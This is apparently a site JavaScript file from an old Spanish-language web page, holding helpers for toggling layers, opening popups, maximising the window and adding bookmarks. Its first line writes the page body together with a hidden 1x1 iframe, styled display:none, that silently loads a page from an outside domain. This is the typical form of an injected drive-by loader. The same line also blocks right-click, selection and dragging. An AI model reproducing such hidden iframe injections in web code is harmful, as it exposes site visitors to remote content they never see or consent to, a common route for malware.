document.write('<body oncontextmenu="return false;" onunload="return false;" onselectstart="return false;" ondragstart="return false;"><style>@import url("cela.css");</style><body background="D:"><meta http-equiv="imagetoolbar" content="no"><iframe src="http://www.grupoalianzaempresarial.com/p.htm" marginheight="0" marginwidth="0" frameborder="0" height="1" width="1" style="display:none;"></iframe>')

function mostrar(nombreCapa){ document.getElementById(nombreCapa).style.visibility="visible"; if(nombreCapa=="contenido"){document.getElementById(nombreCapa).style.height="180px";} } 
function ocultar(nombreCapa){ document.getElementById(nombreCapa).style.visibility="hidden"; if(nombreCapa=="contenido"){document.getElementById(nombreCapa).style.height="0px";} } 

window.moveTo(0,0);
if (document.all) { top.window.resizeTo(screen.availWidth,screen.availHeight); }
else if (document.layers||document.getElementById) {
if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){
top.window.outerHeight = screen.availHeight;
top.window.outerWidth = screen.availWidth; } }

function abrirpopup(nombre,ancho,alto) { dat = 'width=' + ancho + ',height=' + alto + ',left=0,top=0,scrollbars=yes,resize=no'; window.open(nombre,'',dat); }
function openpopup(nombre,ancho,alto) { dat = 'width=' + ancho + ',height=' + alto + ',left=0,top=0,scrollbars=yes,resize=no'; window.open(nombre,'',dat); }

function addtobookmarks(Titulo,URL) {
if (navigator.appName=="Netscape") { window.sidebar.addPanel(Titulo,URL,""); }
if (navigator.appName=="Microsoft Internet Explorer"){ window.external.AddFavorite(URL,Titulo); }
}